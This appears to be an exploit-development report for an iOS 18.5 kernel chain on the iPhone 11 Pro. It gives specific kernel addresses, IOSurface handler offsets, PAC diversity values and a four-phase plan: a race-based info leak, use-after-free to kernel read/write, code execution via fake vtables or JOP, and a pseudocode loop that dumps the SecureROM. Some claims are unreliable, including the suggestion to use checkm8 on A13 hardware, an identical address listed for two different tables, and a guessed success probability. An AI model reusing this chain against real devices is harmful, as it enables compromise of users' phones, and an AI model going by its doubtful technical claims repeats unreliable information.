═══════════════════════════════════════════════════════════════════════
  iOS 18.5 (22F76) — CHAIN B INTELLIGENCE REPORT v3
  iPhone 11 Pro (iPhone12,3) / A13 Bionic (T8030)
  Target: SecureROM Dump at Physical 0x100000000
═══════════════════════════════════════════════════════════════════════

  Generated: Phase 13d (definitive ml_phys_read path analysis)
  PoC: chain_b_ios185_v3.m
  Kernelcache: MH_FILESET, 60,473,344 bytes, 236 entries
  KC SHA256 prefix: 79b92c7dc5b0568b

═══════════════════════════════════════════════════════════════════════
 1. VULNERABILITY: IOSurface Lock Asymmetry Race
═══════════════════════════════════════════════════════════════════════

  s_set_value (selector 6): LOCKED via BL 0x7f4bc20 [lock at 0xa651770]
  s_get_value (selector 5): NO LOCK — 6 vtable dispatches unprotected

  Race window: getter reads property container while setter replaces it.
  Additional vectors:
    - s_set_value_xml (sel 9): NO LOCK, DIFFERENT PAC diversities (0x4578)
    - s_increment/decrement_use (sel 7/8): NO LOCK on refcount ops

  ┌──────────────────────────────────────────────────────────────────┐
  │  Sel  Handler Addr       Lock?   Vtable Calls  Attack Role      │
  ├──────────────────────────────────────────────────────────────────┤
  │   0   0x9e86024          NO      5             Surface creation  │
  │   5   0x857f3a4          NO      6 !!          GETTER (target)   │
  │   6   0x857ee7c          YES     3             SETTER (racer)    │
  │   7   0x861c8d0          NO      2             inc refcount      │
  │   8   0x857e464          NO      2             dec refcount(UAF) │
  │   9   0x857e1ac          NO      3             XML set (typeconf)│
  │  10   0x857dde8          NO      1             XML get           │
  │  11   0x857dba0          NO      1             Bulk set          │
  │  12   0x857d83c          NO      6             Bulk get          │
  └──────────────────────────────────────────────────────────────────┘

═══════════════════════════════════════════════════════════════════════
 2. ml_phys_read_core DUAL-PATH ARCHITECTURE (Phase 13d)
═══════════════════════════════════════════════════════════════════════

  ml_phys_read_core @ 0xfffffff00807b4f8 (113 instructions, 452 bytes)

  ┌─────────────────────────────────────────────────────────────────┐
  │                    ml_phys_read_core(paddr, size)               │
  │                                                                 │
  │  1. Page crossing check: (paddr>>14) == ((paddr+size-1)>>14)?  │
  │     If NO → PANIC (cross-page read not allowed)                │
  │                                                                 │
  │  2. FIRST bounds check:                                         │
  │     gPhysBase = [0x7a6cbb8], gPhysEnd = [0x7a6cbc0]           │
  │     paddr IN [gPhysBase, gPhysEnd)?                             │
  │                                                                 │
  │     ├─ YES → FAST PATH (b.hi → 0x807b5a0)                     │
  │     │   BL 0x8077158 (phystokv variant)                        │
  │     │   Returns: physmap VA = paddr - region_base + va_offset  │
  │     │   Checks 3 physical regions at [0x7a48010]               │
  │     │   Direct read: ldr x20, [physmap_VA]                     │
  │     │   Return immediately (no cleanup needed)                  │
  │     │                                                           │
  │     └─ NO → SLOW PATH (fall through to 0x807b550)             │
  │         Disable preemption (thread->preempt_count++)            │
  │         Page-align paddr                                        │
  │                                                                 │
  │         Second bounds check (page-level):                       │
  │         ├─ IN DRAM: pv_head_table lookup for cache attributes  │
  │         └─ OUTSIDE DRAM:                                        │
  │             BL 0x8070e8c (pmap_attr_lookup)                    │
  │               Binary search through io_ranges table             │
  │               Returns struct ptr or NULL                        │
  │             If NULL: w2=7 (device memory, non-cacheable)        │
  │                                                                 │
  │         BL 0x7ef708c (PPL pmap_enter_physwindow)               │
  │           x15=0xf → dispatches to PPL at 0x7eec070            │
  │           PPL creates temporary PTE in per-CPU physmap window   │
  │           Returns: slot index (0..3)                            │
  │                                                                 │
  │         Compute VA = physmap_base + (slot<<14 | thr<<16 | low) │
  │         Read: ldr x20, [computed_VA]                            │
  │                                                                 │
  │         BL 0x7ef70fc (PPL pmap_remove_physwindow)              │
  │           x15=0x1f → PPL removes temporary PTE                 │
  │         Re-enable preemption (thread->preempt_count--)          │
  │         Return x20                                              │
  └─────────────────────────────────────────────────────────────────┘

  CRITICAL INSIGHT: The SLOW PATH handles ANY physical address.
  The PPL (Page Protection Layer) creates temporary page table entries
  that can map any physical page — not limited to DRAM range.
  BootROM at 0x100000000 takes this path with cache_attr=7 (device mem).

═══════════════════════════════════════════════════════════════════════
 3. CORRECTED GLOBAL VARIABLES
═══════════════════════════════════════════════════════════════════════

  [0xfffffff007a6cbb8]  gPhysBase    Runtime: 0x800000000 (DRAM base)
  [0xfffffff007a6cbc0]  gPhysEnd     Runtime: 0x900000000 (gPhysBase+Size)
        ^^^ CORRECTED: previously labeled "gPhysSize"
        Proof: CMP gPhysEnd, paddr → b.ls (if end <= paddr → outside)
        If this were gPhysSize (0x100000000), DRAM addr 0x800000000
        would fail the check (0x100000000 < 0x800000000).
  
  [0xfffffff007a46d28]  pv_head_table   Page-to-virtual head table
  [0xfffffff007a48010]  phystokv_regions  3 × 24-byte region entries
  [0xfffffff007a6c160]  io_ranges_ptr    IO memory range table pointer
  [0xfffffff007a6c168]  io_ranges_count  Number of IO range entries
  
  physmap_base constant: 0xfffffffbffd00000 (embedded in instructions)

═══════════════════════════════════════════════════════════════════════
 4. COMPLETE ADDRESS REFERENCE (unslid)
═══════════════════════════════════════════════════════════════════════

  KC_BASE:                  0xfffffff007004000

  ── IOSurface Kext ─────────────────────────────────────────────────
  com.apple.iokit.IOSurface:  vmaddr=0x7729b20  fileoff=0x725b20
  Dispatch table (63 entries): 0xfffffff007e56618  (24-byte stride)
  Vtable (777 entries):        0xfffffff007e56618
  Global lock object:          0xfffffff00a651770
  Lock acquire:                0xfffffff007f4bc20
  Lock release:                0xfffffff007f4c894

  ── Dispatch Handlers ──────────────────────────────────────────────
  s_create_surface  (sel 0):   0xfffffff009e86024  [NO LOCK, 320B]
  s_get_value       (sel 5):   0xfffffff00857f3a4  [NO LOCK, 540B]
  s_set_value       (sel 6):   0xfffffff00857ee7c  [LOCKED,  240B]
  s_increment_use   (sel 7):   0xfffffff00861c8d0  [NO LOCK, 400B]
  s_decrement_use   (sel 8):   0xfffffff00857e464  [NO LOCK, 172B]
  s_set_value_xml   (sel 9):   0xfffffff00857e1ac  [NO LOCK, 276B]
  s_get_value_xml   (sel 10):  0xfffffff00857dde8  [NO LOCK, 212B]
  s_bulk_set_value  (sel 11):  0xfffffff00857dba0  [NO LOCK, 212B]
  s_bulk_get_value  (sel 12):  0xfffffff00857d83c  [NO LOCK, 540B]

  ── Physical Memory Primitives ─────────────────────────────────────
  ml_phys_read_core:     0xfffffff00807b4f8  (113 insns, dual-path)
  ml_phys_read_data:     0xfffffff00807b738  (w1=4, 4 bytes)
  ml_phys_read_half:     0xfffffff00807b754  (w1=2, 2 bytes)
  ml_phys_read_byte:     0xfffffff00807b770  (w1=1, 1 byte)
  ml_phys_read_double:   0xfffffff00807b78c  (w1=8, 8 bytes) ← FOR BOOTROM
  ml_phys_write_core:    0xfffffff00807b7a8

  ── ml_phys_read Sub-functions ─────────────────────────────────────
  phys_to_physmap_VA:    0xfffffff008077158  (31 insns, DRAM fast path)
  pmap_attr_lookup:      0xfffffff008070e8c  (47 insns, binary search)
  PPL enter_physwindow:  0xfffffff007ef708c  (x15=0xf → PPL 0x7eec070)
  PPL remove_physwindow: 0xfffffff007ef70fc  (x15=0x1f → PPL 0x7eec070)
  PPL dispatcher:        0xfffffff007eec070

  ── Virtual Memory ─────────────────────────────────────────────────
  phystokv:              0xfffffff0080772c8  (55 insns, panic if unknown)
  kvtophys:              0xfffffff008066510  (90 insns, bounds-checked)
  phystokv region table: 0xfffffff007a48010  (3 entries × 24 bytes)

  ── PAC Diversities ────────────────────────────────────────────────
  Vtable auth (DA key):      0xcda1
  Retain  (IA, vtable+0x20): 0x2e4a
  Release (IA, vtable+0x28): 0x3a87
  s_set_value container:     0x5837  (vtable+0x128)
  s_set_value property:      0x8453  (vtable+0x118)
  s_get_value property:      0x5a20  (vtable+0x148)
  s_get_value helper:        0x4a6a  (vtable+0x68)
  s_get_value alloc:         0x1ac8
  s_set_value_xml handler:   0x4578  (DIFFERENT from binary path!)

═══════════════════════════════════════════════════════════════════════
 5. A13 PHYSICAL MEMORY MAP
═══════════════════════════════════════════════════════════════════════

  0x100000000 → 0x100080000   SecureROM (BootROM) — 512 KB [TARGET]
  0x190000000 → ...           SRAM
  0x200000000 → ...           AMCC registers
  0x800000000 → 0x900000000   DRAM (4 GB) — gPhysBase to gPhysEnd
  
  physmap covers: 0x800000000..0x900000000 (static boot-time mapping)
  physmap VA base: 0xfffffffbffd00000
  
  BootROM at 0x100000000 < gPhysBase (0x800000000)
  → NOT in static physmap → PPL creates temporary mapping on each read

═══════════════════════════════════════════════════════════════════════
 6. HARDWARE ACCESS CONTROL (A13)
═══════════════════════════════════════════════════════════════════════

  GXF (Guarded Execution):    NOT PRESENT (introduced A14)
  KTRR/CTRR:                  Present, protects kernel TEXT only
  SPRR:                       Present, page permission overrides
  AMCC:                       Present, physical memory firewall
  
  BootROM read access from EL1:
    - No GXF → no guarded-mode blocking
    - AMCC may allow or block depending on iBoot configuration
    - Historical: A13 BootROM IS readable from EL1
      (confirmed by security researchers, 2020)
    - Probability: HIGH (estimated 60-90%)
    
  If AMCC blocks:
    - ml_phys_read will return 0 or cause synchronous exception
    - Mitigation: check AMCC filter registers at 0x200000000
    - Alternative: use checkm8 DFU exploit to disable AMCC lockdown

═══════════════════════════════════════════════════════════════════════
 7. EXPLOITATION CHAIN (4 PHASES)
═══════════════════════════════════════════════════════════════════════

  Phase A: Info Leak via Lock Asymmetry Race
  ───────────────────────────────────────────
    Thread 1: s_set_value (LOCKED) — replaces property object
    Thread 2: s_get_value (UNLOCKED) — reads stale/freed pointer
    Thread 3: s_set_value_xml (UNLOCKED, different div 0x4578)
    
    Result: Kernel heap pointer leaked → compute KASLR slide
    Slide = leaked_ptr - known_unslid_addr (aligned to page)

  Phase B: UAF → Kernel R/W
  ──────────────────────────
    1. Race increment/decrement to confuse refcount → premature free
    2. Reclaim freed IOSurface region with controlled data
    3. Fake vtable in reclaimed region → redirect operations
    4. Build kread64/kwrite64 primitives from controlled vtable calls

  Phase C: Kernel Execute
  ─────────────────────────
    Option A: Corrupt IOSurface dispatch table entry → ml_phys_read_double
    Option B: JOP through s_get_value's 6 unlocked vtable dispatches
    Option C: Faketask + thread_set_state for arbitrary function call

  Phase D: BootROM Dump (NEW — Phase 13d simplified)
  ──────────────────────────────────────────────────
    NO gPhysBase patching needed!
    
    for offset in 0..0x80000 step 8:
        val = kexec(ml_phys_read_double, 0x100000000 + offset)
        write(val, 8 bytes)
    
    Total: 65,536 reads × 8 bytes = 512 KB
    
    ml_phys_read_core slow path:
      → PPL enters physwindow (temp PTE)
      → Read from mapped VA
      → PPL removes physwindow
      → Return value
    
    Each read: ~100-200 CPU cycles (preemption disabled window)
    Total time: ~10-50ms for full 512 KB dump

═══════════════════════════════════════════════════════════════════════
 8. SYMBOL TABLE STATUS
═══════════════════════════════════════════════════════════════════════

  MH_FILESET (236 entries): NO LC_SYMTAB in outer header or sub-entries
  __LINKEDIT (704 KB): Contains symbol strings but no nlist64 entries
  
  All addresses resolved via DISASSEMBLY ANALYSIS (not symbols):
    - ADRP + LDR patterns for global variable references
    - BL targets for function call chains
    - Hardcoded constants (physmap_base) in instruction encoding
    - PAC diversity values from MOVK instruction sequences
    - String references for function identification
  
  Strings found in __LINKEDIT:
    _ml_io_map @ 0xa92ebef (function address UNRESOLVED)
    _bcopy_phys @ 0xa92bc52
    _phystokv, _kvtophys (confirmed against disasm-derived addresses)

═══════════════════════════════════════════════════════════════════════
 9. FILES PRODUCED
═══════════════════════════════════════════════════════════════════════

  Analysis Scripts (tools/ipsw-analyst/):
    ios185_full_pipeline.py         Phase 1-8 complete pipeline
    ios185_phase9_typeconfusion.py  Phase 9 type confusion
    ios185_phase10_deep_trace.py    Phase 10 inner function trace
    ios185_lock_scope.py            Phase 10 lock scope verification
    ios185_phase11_physread.py      Phase 11 ml_phys_read resolution
    ios185_phase11b_xref.py         Phase 11b xref analysis
    ios185_phase11c_core.py         Phase 11c core function analysis
    ios185_phase13_iomap.py         Phase 13a ml_io_map scan
    ios185_phase13b_iomap.py        Phase 13b phystokv/kvtophys trace
    ios185_phase13c_symtab.py       Phase 13c MH_FILESET symtab parse
    ios185_phase13d_definitive.py   Phase 13d ml_phys_read path analysis

  Output (tools/ipsw-analyst/):
    phase13_out.txt (3,825 lines)    Phase 13a results
    phase13b_out.txt (198 lines)     Phase 13b results
    phase13c_out.txt (263 lines)     Phase 13c results
    phase13d_out.txt (686 lines)     Phase 13d results (definitive)

  Exploitation:
    extracted/poc_skeletons/chain_b_ios185_v3.m   Complete PoC v3
    extracted/IOS185_CHAIN_B_REPORT_v3.txt        This report

═══════════════════════════════════════════════════════════════════════
 END OF REPORT v3
═══════════════════════════════════════════════════════════════════════
